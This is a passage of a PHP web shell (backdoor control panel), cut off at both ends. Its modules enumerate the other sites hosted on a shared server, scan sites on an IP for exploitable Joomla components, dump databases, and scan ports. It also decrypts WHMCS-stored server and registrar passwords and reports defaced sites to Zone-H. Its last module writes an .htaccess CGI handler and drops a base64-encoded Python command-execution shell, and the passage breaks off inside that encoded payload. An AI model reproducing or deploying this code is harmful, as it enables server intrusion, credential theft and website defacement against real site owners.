				document.location = 'http://xcode.or.id/xcode_magazine_21.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial24') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/hacking_exposed_5.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial25') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/internet_denial_of_service.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial26') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial27') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/hack_attacks_testing.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial28') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial29') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial30') {
                ?>
			<script>
				document.location = 'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
			</script>
			<?php 
            } elseif ($pilih == 'ddd') {
                ?>
			<script>
				document.location = 'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial31') {
                ?>
			<script>
				document.location = 'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'cryptography_for_defeloper') {
                ?>
			<script>
				document.location = 'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'forensic') {
                ?>
			<script>
				document.location = 'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'metasploit') {
                ?>
			<script>
				document.location = 'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'stealing_network') {
                ?>
			<script>
				document.location = 'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'security_polices') {
                ?>
			<script>
				document.location = 'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
			</script>
			<?php 
            }
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'cms_detect') {
        ?>
    <form action="?y=<?php 
        echo $pwd;
        ?>&x=cms_detect" method="post">
	<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b></center><br><br>
    <?php 
        if (!file_exists('pee.tmp')) {
            @fopen('pee.tmp', 'w');
            echo "<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\" class=\"td1\">";
            echo "<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>";
            $p = 0;
            if (is_readable("/var/named")) {
                $list = scandir("/var/named");
                $current_dir = posix_getcwd();
                $dir = explode("/", $current_dir);
                foreach ($list as $domain) {
                    if (strpos($domain, ".db")) {
                        $domain = str_replace('.db', '', $domain);
                        $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
                        error_reporting(0);
                        $link = $pageURL . 'pee/' . $owner['name'];
                        cms_add($link, $domain, $owner['name'], "WordPress");
                        cms_add($link, $domain, $owner['name'], "Joomla");
                        cms_add($link, $domain, $owner['name'], "vBulletin");
                        cms_add($link, $domain, $owner['name'], "WHMCS");
                        cms_add($link, $domain, $owner['name'], "PhpBB");
                        cms_add($link, $domain, $owner['name'], "MyBB");
                        cms_add($link, $domain, $owner['name'], "IPB");
                        cms_add($link, $domain, $owner['name'], "SMF");
                        cms_add($link, $domain, $owner['name'], "Drupal");
                        cms_add($link, $domain, $owner['name'], "e107");
                        cms_add($link, $domain, $owner['name'], "Seditio");
                        cms_add($link, $domain, $owner['name'], "osCommerce");
                    }
                }
            }
        } else {
            echo "<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\" class=\"td1\">";
            echo "<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>";
            $content = file_get_contents($pageURL . 'pee.tmp');
            echo $content;
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'jss') {
        ?>
    <form action="?y=<?php 
        echo $pwd;
        ?>&x=jss" method="post">
    <?php 
        echo "\r\n\r\n<br><br><br><p align=\"center\"><b><font size=\"3\">Enter Targeting IP</font></b></p><br>\r\n<form method=\"POST\">\r\n        <p align=\"center\"><input type=\"text\" class=\"inputz\" name=\"site\" size=\"65\"><input class=\"inputzbut\" type=\"submit\" value=\"Scan\"></p>\r\n</form><center>\r\n\r\n";
        @set_time_limit(0);
        @error_reporting("E_OO\\ICE");
        function check_exploit($comxx)
        {
            $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description={$comxx}&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
            $result = @file_get_contents($link);
            if (eregi("No results", $result)) {
                echo "<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+{$comxx}+joomla+extension'>Download</a></td></tr>";
            } else {
                echo "<td><a href='{$link}'>Found</a></td><td><=</td></tr>";
            }
        }
        function check_com($url)
        {
            $source = @file_get_contents($url);
            preg_match_all('{option,(.*?)/}i', $source, $f);
            preg_match_all('{option=(.*?)(&amp;|&|")}i', $source, $f2);
            preg_match_all('{/components/(.*?)/}i', $source, $f3);
            $arz = array_merge($f2[1], $f[1], $f3[1]);
            $coms = array();
            foreach (array_unique($arz) as $x) {
                $coms[] = $x;
            }
            foreach ($coms as $comm) {
                echo "<tr><td>{$comm}</td>";
                check_exploit($comm);
            }
        }
        function sec($site)
        {
            preg_match_all('{http://(.*?)(/index.php)}siU', $site, $sites);
            if (eregi("www", $sites[0][0])) {
                return $site = str_replace("index.php", "", $sites[0][0]);
            } else {
                return $site = str_replace("http://", "http://www.", str_replace("index.php", "", $sites[0][0]));
            }
        }
        $npages = 50000;
        if ($_POST) {
            $ip = trim(strip_tags($_POST['site']));
            $npage = 1;
            $allLinks = array();
            while ($npage <= $npages) {
                $x = @file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
                if ($x) {
                    preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink);
                    foreach ($findlink[1] as $fl) {
                        $allLinks[] = sec($fl);
                    }
                    $npage += 10;
                    if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0) {
                        break;
                    }
                } else {
                    break;
                }
            }
            $allDmns = array();
            foreach ($allLinks as $kk => $vv) {
                $allDmns[] = $vv;
            }
            echo '<table border="1"  width=\\"80%\\" align=\\"center\\">
<tr><td width=\\"30%\\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>' . $ip . '</b></td></tr>                    
<tr><td width=\\"30%\\"><b>Sites Found&nbsp; : </b></td><td><b>' . count(array_unique($allDmns)) . '</b></td></tr>
</table>';
            echo "<br><br>";
            echo "<table border=\"1\" width=\"80%\" align=\\\"center\\\">";
            foreach (array_unique($allDmns) as $h3h3) {
                echo '<tr id=new><td><b><a href=' . $h3h3 . '>' . $h3h3 . '</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>';
                check_com($h3h3);
            }
            echo "</table>";
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'dump') {
        ?>
    <form action="?y=<?php 
        echo $pwd;
        ?>&x=dump" method="post">
    <?php 
        echo $head . '<p align="center">';
        echo '
<table width=371 class=tabnet >
<tr><th colspan="2">Database Dump</th></tr>
<tr>
	<td>Server </td>
	<td><input class="inputz" type=text name=server size=52></td></tr><tr>
	<td>Username</td>
	<td><input class="inputz" type=text name=username size=52></td></tr><tr>
	<td>Password</td>
	<td><input class="inputz" type=text name=password size=52></td></tr><tr>
	<td>DataBase Name</td>
	<td><input class="inputz" type=text name=dbname size=52></td></tr>
	<tr>
	<td>DB Type </td>
	<td><form method=post action="' . $me . '">
	<select class="inputz" name=method>
		<option  value="gzip">Gzip</option>
		<option value="sql">Sql</option>
		</select>
	<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
	</form></center></table>';
        if ($_POST['username'] && $_POST['dbname'] && $_POST['method']) {
            $date = date("Y-m-d");
            $dbserver = $_POST['server'];
            $dbuser = $_POST['username'];
            $dbpass = $_POST['password'];
            $dbname = $_POST['dbname'];
            $file = "Dump-{$dbname}-{$date}";
            $method = $_POST['method'];
            if ($method == 'sql') {
                $file = "Dump-{$dbname}-{$date}.sql";
                $fp = fopen($file, "w");
            } else {
                $file = "Dump-{$dbname}-{$date}.sql.gz";
                $fp = gzopen($file, "w");
            }
            function write($data)
            {
                global $fp;
                if ($_POST['method'] == 'ssql') {
                    fwrite($fp, $data);
                } else {
                    gzwrite($fp, $data);
                }
            }
            mysql_connect($dbserver, $dbuser, $dbpass);
            mysql_select_db($dbname);
            $tables = mysql_query("SHOW TABLES");
            while ($i = mysql_fetch_array($tables)) {
                $i = $i['Tables_in_' . $dbname];
                $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
                write($create['Create Table'] . ";\n\n");
                $sql = mysql_query("SELECT * FROM " . $i);
                if (mysql_num_rows($sql)) {
                    while ($row = mysql_fetch_row($sql)) {
                        foreach ($row as $j => $k) {
                            $row[$j] = "'" . mysql_escape_string($k) . "'";
                        }
                        write("INSERT INTO {$i} VALUES(" . implode(",", $row) . ");\n");
                    }
                }
            }
            if ($method == 'ssql') {
                fclose($fp);
            } else {
                gzclose($fp);
            }
            header("Content-Disposition: attachment; filename=" . $file);
            header("Content-Type: application/download");
            header("Content-Length: " . filesize($file));
            flush();
            $fp = fopen($file, "r");
            while (!feof($fp)) {
                echo fread($fp, 65536);
                flush();
            }
            fclose($fp);
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'port-sc') {
        ?>
    <form action="?y=<?php 
        echo $pwd;
        ?>&x=port-sc" method="post">
    <?php 
        echo "<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>";
        $start = strip_tags($_POST['start']);
        $end = strip_tags($_POST['end']);
        $host = strip_tags($_POST['host']);
        if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
            for ($i = $start; $i <= $end; $i++) {
                $fp = @fsockopen($host, $i, $errno, $errstr, 3);
                if ($fp) {
                    echo 'Port ' . $i . ' is <font color=green>open</font><br>';
                }
                flush();
            }
        } else {
            echo "<table class=tabnet style=\"width:300px;padding:0 1px;\">\r\n   <input type=\"hidden\" name=\"y\" value=\"phptools\">\r\n   <tr><th colspan=\"5\">Port Scanner</th></center></tr>\r\n   <tr>\r\n\t\t<td>Host</td>\r\n\t\t<td><input type=\"text\" class=\"inputz\"  style=\"width:220px;color:#00ff00;\" name=\"host\" value=\"localhost\"/></td>\r\n   </tr>\r\n   <tr>\r\n\t\t<td>Port start</td>\r\n\t\t<td><input type=\"text\" class=\"inputz\" style=\"width:220px;color:#00ff00;\" name=\"start\" value=\"0\"/></td>\r\n   </tr>\r\n\t<tr><td>Port end</td>\r\n\t\t<td><input type=\"text\" class=\"inputz\"  style=\"width:220px;color:#00ff00;\" name=\"end\" value=\"5000\"/></td>\r\n   </tr><td><input class=\"inputzbut\" type=\"submit\" style=\"color:#00ff00\" value=\"Scan Ports\" />\r\n   </td></form></center></table>";
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'hash') {
        $submit = $_POST['enter'];
        if (isset($submit)) {
            $pass = $_POST['password'];
            // password
            $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
            // random string
            $hash = md5($pass);
            // md5 hash #1
            $md4 = hash("md4", $pass);
            $hash_md5 = md5($salt . $pass);
            // md5 hash with salt #2
            $hash_md5_double = md5(sha1($salt . $pass));
            // md5 hash with salt & sha1 #3
            $hash1 = sha1($pass);
            // sha1 hash #4
            $sha256 = hash("sha256", $text);
            $hash1_sha1 = sha1($salt . $pass);
            // sha1 hash with salt #5
            $hash1_sha1_double = sha1(md5($salt . $pass));
            // sha1 hash with salt & md5 #6
        }
        echo "<form action=\"\" method=\"post\"><b><table class=tabnet>";
        echo "<tr><th colspan=\"2\">Password Hash</th></center></tr>";
        echo "<tr><td><b>masukan kata yang ingin di encrypt:</b></td>";
        echo "<td><input class=\"inputz\" type=\"text\" name=\"password\" size=\"40\" />";
        echo "<input class=\"inputzbut\" type=\"submit\" name=\"enter\" value=\"hash\" />";
        echo "</td></tr><br>";
        echo "<tr><th colspan=\"2\">Hasil Hash</th></center></tr>";
        echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value=' . $pass . '></td></tr><br><br>';
        echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value=' . $hash . '></td></tr><br><br>';
        echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value=' . $md4 . '></td></tr><br><br>';
        echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value=' . $hash_md5 . '></td></tr><br><br>';
        echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value=' . $hash_md5_double . '></td></tr><br><br>';
        echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value=' . $hash1 . '></td></tr><br><br>';
        echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value=' . $sha256 . '></td></tr><br><br>';
        echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value=' . $hash1_sha1 . '></td></tr><br><br>';
        echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value=' . $hash1_sha1_double . '></td></tr><br><br></table>';
    } elseif (isset($_GET['x']) && $_GET['x'] == 'whmcs') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=whmcs" method="post">

<?php 
        function decrypt($string, $cc_encryption_hash)
        {
            $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
            $hash_key = _hash($key);
            $hash_length = strlen($hash_key);
            $string = base64_decode($string);
            $tmp_iv = substr($string, 0, $hash_length);
            $string = substr($string, $hash_length, strlen($string) - $hash_length);
            $iv = $out = '';
            $c = 0;
            while ($c < $hash_length) {
                $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
                ++$c;
            }
            $key = $iv;
            $c = 0;
            while ($c < strlen($string)) {
                if ($c != 0 and $c % $hash_length == 0) {
                    $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
                }
                $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
                ++$c;
            }
            return $out;
        }
        function _hash($string)
        {
            if (function_exists('sha1')) {
                $hash = sha1($string);
            } else {
                $hash = md5($string);
            }
            $out = '';
            $c = 0;
            while ($c < strlen($hash)) {
                $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
                $c += 2;
            }
            return $out;
        }
        echo "\r\n<br><center><font size='5' color='#00ff00'><b>-=[ WHMCS Decoder ]=-</b></font></center>\r\n<center>\r\n<br>\r\n\r\n<FORM action=''  method='post'>\r\n<input type='hidden' name='form_action' value='2'>\r\n<br>\r\n<table class=tabnet style=width:320px;padding:0 1px;>\r\n<tr><th colspan=2>WHMCS Decoder</th></tr> \r\n<tr><td>db_host </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>\r\n<tr><td>db_username </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>\r\n<tr><td>db_password</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>\r\n<tr><td>db_name</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>\r\n<tr><td>cc_encryption_hash</td><td><input style='color:#00ff00;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>\r\n<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#00ff00;background-color:'  value='Submit' name='Submit'></td>\r\n</table>\r\n</FORM>\r\n</center>\r\n";
        if ($_POST['form_action'] == 2) {
            //include($file);
            $db_host = $_POST['db_host'];
            $db_username = $_POST['db_username'];
            $db_password = $_POST['db_password'];
            $db_name = $_POST['db_name'];
            $cc_encryption_hash = $_POST['cc_encryption_hash'];
            $link = mysql_connect($db_host, $db_username, $db_password);
            mysql_select_db($db_name, $link);
            $query = mysql_query("SELECT * FROM tblservers");
            while ($v = mysql_fetch_array($query)) {
                $ipaddress = $v['ipaddress'];
                $username = $v['username'];
                $type = $v['type'];
                $active = $v['active'];
                $hostname = $v['hostname'];
                echo "<center><table border='1'>";
                $password = decrypt($v['password'], $cc_encryption_hash);
                echo "<tr><td>Type</td><td>{$type}</td></tr>";
                echo "<tr><td>Active</td><td>{$active}</td></tr>";
                echo "<tr><td>Hostname</td><td>{$hostname}</td></tr>";
                echo "<tr><td>Ip</td><td>{$ipaddress}</td></tr>";
                echo "<tr><td>Username</td><td>{$username}</td></tr>";
                echo "<tr><td>Password</td><td>{$password}</td></tr>";
                echo "</table><br><br></center>";
            }
            $link = mysql_connect($db_host, $db_username, $db_password);
            mysql_select_db($db_name, $link);
            $query = mysql_query("SELECT * FROM tblregistrars");
            echo "<center>Domain Reseller <br><table class=tabnet border='1'>";
            echo "<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>";
            while ($v = mysql_fetch_array($query)) {
                $registrar = $v['registrar'];
                $setting = $v['setting'];
                $value = decrypt($v['value'], $cc_encryption_hash);
                if ($value == "") {
                    $value = 0;
                }
                $password = decrypt($v['password'], $cc_encryption_hash);
                echo "<tr><td>{$registrar}</td><td>{$setting}</td><td>{$value}</td></tr>";
            }
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'zone') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=zone" method="post">

<br><br><center>
<!-- Zone-H -->
<form action="" method='POST'><table><table class='tabnet'><tr>
<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
<input type="text" class="inputz" name="defacer" value="Nama Defacer" />
<select name="hackmode" class="inputz" >
<option >------------------------Pilih Salah Satu------------------------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access bruteforcing</option>
<option value="20" >Remote administrative panel access password guessing</option>
<option value="21" >Remote administrative panel access social engineering</option>
<option value="22" >Attack against administrator(password stealing/sniffing)</option>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
</select>

<select name="reason" class="inputz" >
<option >-------------Pilih Salah Satu---------------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
<input type="hidden" name="action" value="zone">
<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
</form></td></tr></table></form>
<!-- End Of Zone-H -->
</td></center><br><br>

<?php 
        echo "<center>";
        ob_start();
        $sub = get_loaded_extensions();
        if (!in_array("curl", $sub)) {
            die('[-] Curl Is Not Supported !! ');
        }
        $hacker = $_POST['defacer'];
        $method = $_POST['hackmode'];
        $neden = $_POST['reason'];
        $site = $_POST['domain'];
        if (empty($hacker)) {
            die("[-] You Must Fill the Attacker name !");
        } elseif ($method == "--------SELECT--------") {
            die("[-] You Must Select The Method !");
        } elseif ($neden == "--------SELECT--------") {
            die("[-] You Must Select The Reason");
        } elseif (empty($site)) {
            die("[-] You Must Inter the Sites List ! ");
        }
        $i = 0;
        $sites = explode("\n", $site);
        while ($i < count($sites)) {
            if (substr($sites[$i], 0, 4) != "http") {
                $sites[$i] = "http://" . $sites[$i];
            }
            ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
            echo "Site : " . $sites[$i] . " Defaced !\n";
            ++$i;
        }
        echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
        echo "</center>";
    } elseif (isset($_GET['x']) && $_GET['x'] == 'bypass-cf') {
        echo "\r\n<form method=\"POST\"><br><br>\r\n<center><p align=\"center\" dir=\"ltr\"><b><font size=\"5\" face=\"Tahoma\">+--=[ Bypass\r\n<font color=\"#CC0000\">CloudFlare</font> ]=--+</font></b></p>\r\n<select class=\"inputz\" name=\"krz\">\r\n\t<option>ftp</option>\r\n\t\t<option>direct-conntect</option>\r\n\t\t\t<option>webmail</option>\r\n\t\t\t\t<option>cpanel</option>\r\n</select>\r\n<input class=\"inputz\" type=\"text\" name=\"target\" value=\"url\">\r\n<input class=\"inputzbut\" type=\"submit\" value=\"Bypass\"></center>\r\n\r\n";
        $target = $_POST['target'];
        # Bypass From FTP
        if ($_POST['krz'] == "ftp") {
            $ftp = gethostbyname("ftp." . "{$target}");
            echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \r\nip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$ftp}</font></p>";
        }
        # Bypass From Direct-Connect
        if ($_POST['krz'] == "direct-conntect") {
            $direct = gethostbyname("direct-connect." . "{$target}");
            echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \r\nip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$direct}</font></p>";
        }
        # Bypass From Webmail
        if ($_POST['krz'] == "webmail") {
            $web = gethostbyname("webmail." . "{$target}");
            echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \r\nip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$web}</font></p>";
        }
        # Bypass From Cpanel
        if ($_POST['krz'] == "cpanel") {
            $cpanel = gethostbyname("cpanel." . "{$target}");
            echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \r\nip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$cpanel}</font></p>";
        }
    } elseif (isset($_GET['x']) && $_GET['x'] == 'hashid') {
        if (isset($_POST['gethash'])) {
            $hash = $_POST['hash'];
            if (strlen($hash) == 32) {
                $hashresult = "MD5 Hash";
            } elseif (strlen($hash) == 40) {
                $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
            } elseif (strlen($hash) == 13) {
                $hashresult = "DES(Unix) Hash";
            } elseif (strlen($hash) == 16) {
                $hashresult = "MySQL Hash / /DES(Oracle Hash)";
            } elseif (strlen($hash) == 41) {
                $GetHashChar = substr($hash, 40);
                if ($GetHashChar == "*") {
                    $hashresult = "MySQL5 Hash";
                }
            } elseif (strlen($hash) == 64) {
                $hashresult = "SHA-256 Hash";
            } elseif (strlen($hash) == 96) {
                $hashresult = "SHA-384 Hash";
            } elseif (strlen($hash) == 128) {
                $hashresult = "SHA-512 Hash";
            } elseif (strlen($hash) == 34) {
                if (strstr($hash, '$1$')) {
                    $hashresult = "MD5(Unix) Hash";
                }
            } elseif (strlen($hash) == 37) {
                if (strstr($hash, '$apr1$')) {
                    $hashresult = "MD5(APR) Hash";
                }
            } elseif (strlen($hash) == 34) {
                if (strstr($hash, '$H$')) {
                    $hashresult = "MD5(phpBB3) Hash";
                }
            } elseif (strlen($hash) == 34) {
                if (strstr($hash, '$P$')) {
                    $hashresult = "MD5(Wordpress) Hash";
                }
            } elseif (strlen($hash) == 39) {
                if (strstr($hash, '$5$')) {
                    $hashresult = "SHA-256(Unix) Hash";
                }
            } elseif (strlen($hash) == 39) {
                if (strstr($hash, '$6$')) {
                    $hashresult = "SHA-512(Unix) Hash";
                }
            } elseif (strlen($hash) == 24) {
                if (strstr($hash, '==')) {
                    $hashresult = "MD5(Base-64) Hash";
                }
            } else {
                $hashresult = "Hash type not found";
            }
        } else {
            $hashresult = "Not Hash Entered";
        }
        ?>
	<center><br><Br><br>
	
		<form action="" method="POST">
		<tr>
		<table class="tabnet">
		<th colspan="5">Hash Identification</th>
		<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>	<td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
		<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php 
        echo $hashresult;
        ?></td></tr></b>
	</table></tr></form>
	</center>
	
	<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'python') {
        echo "<center/><br/><b>\r\n +--==[ python  Bypass Exploit ]==--+ \r\n </b><br><br>";
        mkdir('python', 0755);
        chdir('python');
        $kokdosya = ".htaccess";
        $dosya_adi = ".htaccess";
        $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
        $metin = "AddHandler cgi-script .izo";
        fwrite($dosya, $metin);
        fclose($dosya);
        $pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
